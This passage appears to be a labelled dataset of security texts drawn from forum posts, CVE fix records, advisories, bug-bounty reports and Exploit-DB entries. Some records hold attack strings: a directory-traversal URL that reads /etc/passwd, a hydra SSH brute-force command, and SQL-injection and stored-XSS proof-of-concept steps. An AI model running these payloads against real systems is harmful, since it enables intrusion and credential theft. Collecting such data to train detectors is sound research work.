penetration testing, red teaming, and offensive cyber operations. Your expertise could provide invaluable insights into these practices. Who I’m Looking For: Individuals with hands-on experience using Bloodhound. Those willing to share their insights. What’s In It For You: An opportunity to contribute to a study that aims to enhance deployment of cybersecurity deception tools. acknowledgment in research publications (username or real name as preferred) How to Participate: Please reach out via andrew.reeves@adelaide.edu.au if you’re interested or have any questions. Participation involves up to 1 hour of preparation time (familiarising yourself with a provided bloodhound map) and a short (30 minute) interview with the researcher. You can opt to complete a short survey instead of the interview if preferred. Your expertise is greatly appreciated and will help shape the deployment of new cyber deception tools. Thank you! Andrew", "source": "hackersploit", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0c88787bd7dbc059589f", "text": "Brainfuck admin page\n\nThere is no config pages in admin its just a profile page i have administrator access by privillage esculation exploit", "source": "hackthebox", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "03036f25c444426993b1", "text": "CVE: CVE-2022-1727\n\n[{'lang': 'en', 'value': 'Improper Input Validation in GitHub repository jgraph/drawio prior to 18.0.6.'}]\n\nFix commit: 18.0.4 release", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "867111fd0792ddd76eb5", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-05-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a2ff4ac0aadaf1281530", "text": "SolarView Compact 6.00 - Directory Traversal\n\n# Exploit Title: SolarView Compact 6.00 - Directory Traversal\n# Date: 2022-05-15\n# Exploit Author: Ahmed Alroky\n# Author Company : Aiactive\n# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/\n# Version: ver.6.00\n# Vendor home page : https://www.contec.com/\n# Authentication Required: No\n# CVE : CVE-2022-29298\n\n# Tested on: Windows\n\n# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg", "source": "exploitdb", "timestamp": "2022-06-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d4c4332ca1647713cf7f", "text": "No You have to bruteforce absolutely nothing. Find the right list of default passwords.", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e53d063b645ae1972a02", "text": "Thank you @onthesauce for awesome help. You are nothing short of awesomeness. My two cents to whoever follows this post in search of hints to solve is that try every combinations and dont hesitate to add up your reply for more help. If you happen to use chrome to solve this assessment, solution may not show up on the page even after you had already solved it. As for me chrome was not showing any message from the server like ‘Access Denied’ or ‘File copy errors’ and so on. However, they were visible when I inspected it in the code inspector, went on to network tab and checked in the preview tab. It may be visible to you if you are using mozilla anyways.", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fcb3bb13d6644ed780a4", "text": "I thought the ${LS_COLORS:10:1} would come from the printenv command and would assume the ; caracter. I have reached the injection point, i can already see the whoami and ls o’u’t’pu’ts but i cant cat the file.", "source": "hackthebox", "timestamp": "2022-07-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e66ff53a2f5a72664259", "text": "[Code Injection] CVE-2023-5528: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes\n\nThis is an imported report from the email i have sent a month ago about a code injection vulnerability\nThe vulnerability was assigned as CVE-2023-5528\nAs a reference i have talked with Balaji from the k8 team.\nExcerpts from the email chain that might be relevant:\n\n\"Just a quick update to let you know that we were able to reproduce the issue and are working on a fix. CVE-2023-5528 has been reserved for this issue. We'll keep you updated on the next steps as we review the proposed fix.\"\n\n\"Hi Tomer,\nThis is being rated as a Tier 1 High severity ($5,000) bounty.\"\n\nThe vulnerability was verified and assigned a CVE by the k8 team\n\n## Impact\n\nCode execution from kubelet context(SYSYTEM privileges) on all windows nodes on a cluster.", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "515a882fd679542f13b6", "text": "CVE: CVE-2022-0589\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.'}]\n\nFix commit: XSS fixes (#13780)", "source": "cvefixes", "timestamp": "2022-02-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4cde88042c5490fb4c2c", "text": "It probably will take forever if you’re using the /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt . Consider using wordlists that are using common names. If the wordlist is sorted alphabetically, the hit will be near the bottom…not a big fan of how long to wait on some of these assessments.", "source": "hackthebox", "timestamp": "2023-01-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f148a03f0e372e1a231a", "text": "CVE: CVE-2022-23653\n\n[{'lang': 'en', 'value': 'B2 Command Line Tool is the official command line tool for the backblaze cloud storage service. Linux and Mac releases of the B2 command-line tool version 3.2.0 and below contain a key disclosure vulnerability that, in certain conditions, can be exploited by local attackers through a time-of-check-time-of-use (TOCTOU) race condition. The command line tool saves API keys (and bucket name-to-id mapping) in a local database file (`$XDG_CONFIG_HOME/b2/account_info`, `~/.b2_account_info` or a user-defined path) when `b2 authorize-account` is first run. This happens regardless of whether a valid key is provided or not. When first created, the file is world readable and is (typically a few milliseconds) later altered to be private to the user. If the directory is readable by a local attacker and the user did not yet run `b2 authorize-account` then during the brief period between file creation and permission modification, a local attacker can race to open the file and maintain a handle to it. This allows the local attacker to read the contents after the file after the sensitive information has been saved to it. Users that have not yet run `b2 authorize-account` should upgrade to B2 Command-Line Tool v3.2.1 before running it. Users that have run `b2 authorize-account` are safe if at the time of the file creation no other local users had read access to the local configuration file. Users that have run `b2 authorize-account` where the designated path could be opened by another local user should upgrade to B2 Command-Line Tool v3.2.1 and remove the database and regenerate all application keys. Note that `b2 clear-account` does not remove the database file and it should not be used to ensure that all open handles to the file are invalidated. If B2 Command-Line Tool cannot be upgraded to v3.2.1 due to a dependency conflict, a binary release can be used instead. Alternatively a new version could be installed within a virtualenv, or the permissions can be changed to prevent local users from opening the database file.'}]\n\nFix commit: Release v3.2.1", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "efa486134b876999b4b9", "text": "Been stuck on this one for 4 days. Still stuck on first question trying to brute force the ssh login. Created personalized wordlist using Firstname William, Surname Gates, Nickname Bill. Using sed to shorten it to meet password requirements. Can’t get a hit on the password. Tried using rockyou-70 as well just incase I misunderstood. Command I’m using is hydra -l b.gates -P William.txt -u -f ssh://IP_Address:Port -t 4 Any guidance would be much appreciated!", "source": "hackthebox", "timestamp": "2023-09-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7402d9d9fd36a341997a", "text": "CVE: CVE-2022-29184\n\n[{'lang': 'en', 'value': 'GoCD is a continuous delivery server. In GoCD versions prior to 22.1.0, it is possible for existing authenticated users who have permissions to edit or create pipeline materials or pipeline configuration repositories to get remote code execution capability on the GoCD server via configuring a malicious branch name which abuses Mercurial hooks/aliases to exploit a command injection weakness. An attacker would require access to an account with existing GoCD administration permissions to either create/edit (`hg`-based) configuration repositories; create/edit pipelines and their (`hg`-based) materials; or, where \"pipelines-as-code\" configuration repositories are used, to commit malicious configuration to such an external repository which will be automatically parsed into a pipeline configuration and (`hg`) material definition by the GoCD server. This issue is fixed in GoCD 22.1.0. As a workaround, users who do not use/rely upon Mercurial materials can uninstall/remove the `hg`/Mercurial binary from the underlying GoCD Server operating system or Docker image.'}]\n\nFix commit: Improve escaping of arguments when constructing Hg command calls", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "964907b35ec051e8ab30", "text": "can you help me the diggin in part i can’t get the flag", "source": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b525648476967da1acc2", "text": "I do it in this way and work very perfect netstat -luntp | grep “0.0.0.” | grep -v “127.0.0” | grep “LISTEN” | wc -l 2>/dev/null", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aa0bbb8fbcf64895e133", "text": "I hope you find this helpful, MoCA adapters and network extenders offer throughput speeds of up to 2.5Gbps and are perfect for removing dead spots in your network. They are an excellent way to improve a home or corporate network without installing new wiring since they work off of existing coaxial cables. They offer high security, too, and are relatively simple to install. Whether you want to stream your videos at the highest quality possible, up your online gameplay or improve your company’s efficiency, MoCA technology can help.", "source": "hackersploit", "timestamp": "2022-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "831edfd9667c04f4c85e", "text": "Ivanti Endpoint Manager Mobile (EPMM) Path Traversal Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM) contains a path traversal vulnerability that enables an authenticated administrator to perform malicious file writes to the EPMM server. This vulnerability can be used in conjunction with CVE-2023-35078 to bypass authentication and ACLs restrictions (if applicable).\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "source": "cisa_kev", "timestamp": "2023-07-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d3654f5191b98a1965b2", "text": "@kkkkkkk some of the target machines are pretty complex, after you spawn the target it may take up to 5 or 10 minutes to actually deploy the docker instance. I know it gives you the IP address right away. But give it time. Some of the WordPress and Session Security exercises seem to take forever to load. These things are not instantaneous. Just give it a few more seconds to load lol. -onthesauce", "source": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1ae4312229243bc1cef3", "text": "CVE: CVE-2022-1782\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository erudika/para prior to v1.45.11.'}]\n\nFix commit: added option to escape HTML when compiling Mustache templates", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d38fcfde9f9067ff85b5", "text": "yep, “just run everything with sudo” means there’s no use for sudo and you might as well just log in as root. On the next set of questions, one question is about running tcpdump to capture traffic on an interface. The accepted answer does not include sudo - in real life, without some fiddling, this will actually need sudo", "source": "hackthebox", "timestamp": "2022-06-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "32ba4f473d3c65be0fd0", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-08-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4675640f85617508829d", "text": "Virtualenv \"bash: python: command not found\"\n\nWhen using VScodium and creating a folder I’m getting this error message after trying to create a virtualenv with ‘python -m venv name’ inside my directory of interest: “bash: python: command not found”. I tried to solve it by installing - ‘sudo apt install python3-virtualenv’ but no luck, the error persist. Does anybody know what it’s missing???", "source": "parrotsec", "timestamp": "2023-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c818e69a006f5830bce3", "text": "CVE: CVE-2022-28959\n\n[{'lang': 'en', 'value': 'Multiple cross-site scripting (XSS) vulnerabilities in the component /spip.php of Spip Web Framework v3.1.13 and below allows attackers to execute arbitrary web scripts or HTML.'}]\n\nFix commit: Divers petites sanitization et une balise manquante #4494", "source": "cvefixes", "timestamp": "2022-05-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8acb9d8f9e08ac3f1b3e", "text": "Hi, How did you get the result of Harry is 1337?. What method did you used?", "source": "hackthebox", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "084647247b6feaa02db2", "text": "CVE: CVE-2022-24769\n\n[{'lang': 'en', 'value': \"Moby is an open-source project created by Docker to enable and accelerate software containerization. A bug was found in Moby (Docker Engine) prior to version 20.10.14 where containers were incorrectly started with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during `execve(2)`. Normally, when executable programs have specified permitted file capabilities, otherwise unprivileged users and processes can execute those programs and gain the specified file capabilities up to the bounding set. Due to this bug, containers which included executable programs with inheritable file capabilities allowed otherwise unprivileged users and processes to additionally gain these inheritable file capabilities up to the container's bounding set. Containers which use Linux users and groups to perform privilege separation inside the container are most directly impacted. This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in Moby (Docker Engine) 20.10.14. Running containers should be stopped, deleted, and recreated for the inheritable capabilities to be reset. This fix changes Moby (Docker Engine) behavior such that containers are started with a more typical Linux environment. As a workaround, the entry point of a container can be modified to use a utility like `capsh(1)` to drop inheritable capabilities prior to the primary process starting.\"}]\n\nFix commit: Merge pull request from GHSA-2mm7-x5h6-5pvq\n\noci: inheritable capability set should be empty", "source": "cvefixes", "timestamp": "2022-03-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8bf2aa353829870b4011", "text": "CVE: CVE-2021-43515\n\n[{'lang': 'en', 'value': 'CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.'}]\n\nFix commit: version 1.14.1 (#2532)\n\n* no back links in modal pages\r\n* remove unused service links to bountysource and gitter\r\n* add validation for budget and time-budget fields\r\n* display time budget if set\r\n* remove console log\r\n* sanitize DDE payloads\r\n* do not show status and name in version string", "source": "cvefixes", "timestamp": "2022-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a49568c7a67762bd5a89", "text": ".NET Information Disclosure Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-35391: .NET Information Disclosure Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET core 2.1, .NET 6.0 and, .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in ASP.NET Core 2.1, .NET 6.0 and, .NET 7.0 applications using SignalR when redis backplane use might result in information disclosure.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/267\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0 application running on .NET 7.0.9 or earlier.\n* Any .NET 6.0 application running on .NET 6.0.20 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 7.0.0, <= 7.0.9 | 7.0.10\n\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 6.0.0, <= 6.0.20 | 6.0.21\n\n### ASP.NET Core 2.1\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.SignalR.Redis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.Redis) | < 1.0.40 | 1.0.40\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.300\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.300 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0 and and .NET 7.0 updates are also available from Microso", "source": "github_advisory", "timestamp": "2023-08-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8b3bc765b241567eea86", "text": "[Uncontrolled Resource Consumption] [CVE-2022-44571] Possible Denial of Service Vulnerability in Rack Content-Disposition parsing\n\nI made a report and patch at https://hackerone.com/reports/1675235\n\nhttps://discuss.rubyonrails.org/t/cve-2022-44571-possible-denial-of-service-vulnerability-in-rack-content-disposition-parsing/82126\n\n> There is a denial of service vulnerability in the Content-Disposition parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44571.\n> Carefully crafted input can cause Content-Disposition header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. This header is used typically used in multipart parsing. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\n\n## Impact\n\nAny applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\nSince it is a manipulation of the request body, it is possible to bypass the request header size limit and make more dangerous attacks.\n\nIt was possible to attack ReDoS on many servers without authentication, but in the case of this regular expression, if it is ruby 3.2 or higher, there is a memoization countermeasure, so it is not a threat.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8b86b30945bcddfc1976", "text": "CVE: CVE-2022-29156\n\n[{'lang': 'en', 'value': 'drivers/infiniband/ulp/rtrs/rtrs-clt.c in the Linux kernel before 5.16.12 has a double free related to rtrs_clt_dev_release.'}]\n\nFix commit: RDMA/rtrs-clt: Fix possible double free in error case\n\nCallback function rtrs_clt_dev_release() for put_device() calls kfree(clt)\nto free memory. We shouldn't call kfree(clt) again, and we can't use the\nclt after kfree too.\n\nReplace device_register() with device_initialize() and device_add() so that\ndev_set_name can() be used appropriately.\n\nMove mutex_destroy() to the release function so it can be called in\nthe alloc_clt err path.\n\nFixes: eab098246625 (\"RDMA/rtrs-clt: Refactor the failure cases in alloc_clt\")\nLink: https://lore.kernel.org/r/20220217030929.323849-1-haris.iqbal@ionos.com\nReported-by: Miaoqian Lin \nSigned-off-by: Md Haris Iqbal \nReviewed-by: Jack Wang \nSigned-off-by: Jason Gunthorpe ", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "de46003ff11ed8723e7a", "text": "REDCap 11.3.9 - Stored Cross Site Scripting\n\n# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting\n# Date: 2021-10-11\n# Exploit Author: Kendrick Lam\n# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js\n# Vendor Homepage: https://projectredcap.org\n# Software Link: https://projectredcap.org\n# Version: Redcap before 11.4.0\n# Tested on: 11.2.5\n# CVE: CVE-2021-42136\n# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf\n\n### Stored XSS – Missing Data Code Value (found by Kendrick Lam)\n\nIt was possible to store JavaScript as values for Missing Data Codes.\n\n- Where: Missing Data Code.\n- Payload:\n\t\t\n- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).\n- Privileges: Low privileged / regular user\n- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX\n\n- Privileges:\n + Store: Low privileged user is able to store Missing Data Code values.\n + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX", "source": "exploitdb", "timestamp": "2022-04-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "52103099e28af24e11a7", "text": "Performing an attack from one separate network to another different network resource is possible using several techniques, such as port scanning, network mapping, and exploiting vulnerabilities in network devices or applications. However, performing such an attack without proper authorization is illegal and unethical. I cannot provide instructions on how to perform such an attack. Regarding your question about performing a low-level intensity attack on the HTTP protocol on an MS Windows webserver, I cannot provide guidance on performing attacks as it goes against ethical standards. However, I can suggest that you study and understand the HTTP protocol, web application architecture, and common web application vulnerabilities. You can use various tools such as Burp Suite, OWASP ZAP, or Nmap for web application penetration testing. Additionally, you can use Wireshark to capture network traffic on a standalone server. It's important to note that ethical hacking or penetration testing should only be done with proper authorization and should be performed in a controlled environment to prevent any harm to the target network or system. It's recommended that you seek proper training and certification before attempting any such activities.", "source": "go4expert", "timestamp": "2023-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4efab9686a3db48f9260", "text": "Hey dude, It sounds like you are going hella above and beyond for this challenge. You look to be in the right place, but you shouldn’t need all the advanced payloads that you are trying to use. Feel free to DM me and I will see if I can point you in a better direction. -onthesauce", "source": "hackthebox", "timestamp": "2022-11-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1c98e34a1c3cb5242628", "text": "There are only two chipsets that serious cybersecurity specialists do recommend, the Atheros AR9271 and the Realtek RTL8812AU. For more information related to these chipsets, you may find David Bombal’s YT videos useful. Or you know, google it. If you want to do packet injection and monitor nearby networks you gotta have an adapter that has these capabilities. There are more out there, other chipsets but I honestly believe these are the best money can buy, Both chipsets can be found in the ALFA adapters which everyone agrees are the best. Which specific adapter, there are a few, depends on your budget, how easy are to conceal and of course, availability, not everyone lives in a country where ALFA products will be easy to find. A more affordable option is the TP-Link WN722N version 1, it comes with the Atheros chipset and I think works out of the box, aka plug and play, but today’s market has only version 2 or 3 available which cant do monitor mode and packet injection without drivers and help. If you find a version 1 adapter you are a lucky man, if not Bombal’s videos help you to install the drivers, and voila, within minutes your TP-Link will work but bear in mind the chipset isn’t the Atheros or the Realtek 8812au, rather another version, can’t remember which one now. It will work but in terms of performance and quality is considered inferior quality. I talked about brands but more important than the brand is the chipset which, if you are lucky, you can find in unbranded generic adapters like the Wifi Nation and others. Mine is an unbranded one with the RTL8812AU chipset. If you find a cheaper unbranded adapter that comes in cheap miserable packaging but the chipset is one of the two, then go get it. Keep in mind that Atheros is single-band only, 2.4 while the RTL is dual, 2.4 and 5.8 I hope you find this information useful.", "source": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "43932b5133fef524db0b", "text": "What I did is after each change happen in rdx i coppied it and combine them and then used loader.py and put the hex values combined without the 0x and it worked.", "source": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3ef030c81d81d1c69a65", "text": "Stored XSS vulnerability in Jenkins Custom Checkbox Parameter Plugin\n\n[Severity: HIGH]\n\nCustom Checkbox Parameter Plugin 1.4 and earlier does not escape the name and description of the parameter types it provides.\n\nThis results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-10-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bd841e264b73ddf54a6e", "text": "Hey! anyone getting stuck at this question just make sure to use the virtual machine (pwnbox) , just make your for-loop as you know and submit the flag (use all the code). (not all packages are installed at kali so use the docker machine)", "source": "hackthebox", "timestamp": "2022-05-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a198e03e380b48c758bd", "text": "CVE: CVE-2014-0156\n\n[{'lang': 'en', 'value': 'Awesome spawn contains OS command injection vulnerability, which allows execution of additional commands passed to Awesome spawn as arguments. If untrusted input was included in command arguments, attacker could use this flaw to execute arbitrary command.'}]\n\nFix commit: Separate command line building and sanitizing into its own class.", "source": "cvefixes", "timestamp": "2022-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fb3c34396f9df370f1d2", "text": "Hello. I’m still a newbie at this. However, I tried what you suggested in your answer. I used dig and identified the subdomains which allowed zone transfer. I enumerated the subdomains that don’t allow zone transfer. And yet, I am still lost and couldn’t figure out the solution to this question. Any more hints would be helpful since I feel frustrated and lost and spent too much time on this problem. thanks", "source": "hackthebox", "timestamp": "2022-02-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d8f6c237bb43a32af544", "text": "Hi @EM472020 Have you looked at crontab? Knowledge Base by phoenixNAP – 28 Oct 20 Crontab Reboot: Execute a Job Automatically at Boot | phoenixNAP The Cron daemon is a Linux utility used for scheduling tasks. Learn how to configure cron jobs to run automatically on boot. Est. reading time: 3 minutes", "source": "parrotsec", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aa55b1988b55716f22bd", "text": "Hey, Regarding the malicious employ, does he login trough HTTP or he is login with a different protocol. Because i was able to find the name of the picture but i am not able to find the username. I found from the logs that was added a username in Windows with password but this username is not the correct one. Could you please give a little bit hint, how to find the employee because the question is not so clear. Thanks in advance.", "source": "hackthebox", "timestamp": "2022-04-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "439e8532a51327268731", "text": "I am also having issue with the final assessment. I didn’t think to take notes when completing the earlier labs. I have gathered from reading the threads that Harry Potter was the employee we found earlier. I have tried to go back into that lab to see what the password requirements were and any other clues etc. But it will not let me back onto that page, perhaps because I already completed with and input the flag? I tried using CUPP with Harry and Harry Potter. I also used the usernameGenerator with Harry Potter and have tried hyrda attacking ssh with those two lists I generated. Can someone help point me in what I am missing please?", "source": "hackthebox", "timestamp": "2022-01-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "868de3d5c6c221e2e2d8", "text": "CVE: CVE-2022-0896\n\n[{'lang': 'en', 'value': 'Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update AdminCommentController.php", "source": "cvefixes", "timestamp": "2022-03-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3134720f7014f25e4840", "text": "CVE: CVE-2022-21159\n\n[{'lang': 'en', 'value': 'A denial of service vulnerability exists in the parseNormalModeParameters functionality of MZ Automation GmbH libiec61850 1.5.0. A specially-crafted series of network requests can lead to denial of service. An attacker can send a sequence of malformed iec61850 messages to trigger this vulnerability.'}]\n\nFix commit: - fixed - Bug in presentation layer parser can cause infinite loop (LIB61850-302)", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2b6f55b3d5cc573ff1be", "text": "Does someone else have a 504 Gateway Timeout on PHP file? I lost my reverse shell after a Ctrl+C but couldn’t resend my payload because every PHP page send a 504. Root HTML works fine though. I’m on EU Fortress 1", "source": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "24ec0cb4820255ca1d06", "text": "Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated\n\n# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated\n# Date: 20/01/2023\n# Exploit Author: Rahul Patwari\n# Vendor Homepage: https://phpgurukul.com/\n# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip\n# Version: 1.0\n# Tested on: XAMPP / Windows 10\n# CVE : CVE-2023-23163\n\n# Proof of Concept:\n\n# 1- Install The application Art Gallery Management System Project v1.0\n\n# 2- Navigate to admin login page and login with the valid username and password.\n URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php\n\n# 3- Now navigate \"Manage ART TYPE\" by clicking on \"ART TYPE\" option on left side bar.\n\n# 4- Now click on any of the Art Type \"Edit\" button and you will redirect to the edit page of art type.\n\n# 5- Now insert a single quote ( ' ) on \"editid\" parameter to break the database query, you will see the output is not shows.\n\n# 6- Now inject the payload double single quote ('') in the \"editid\" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.\n\n# 7- Now find how many column are returns by the SQL query. this query will return 6 column.\n Payload:editid=6%27order%20by%203%20--%20-\n\n# 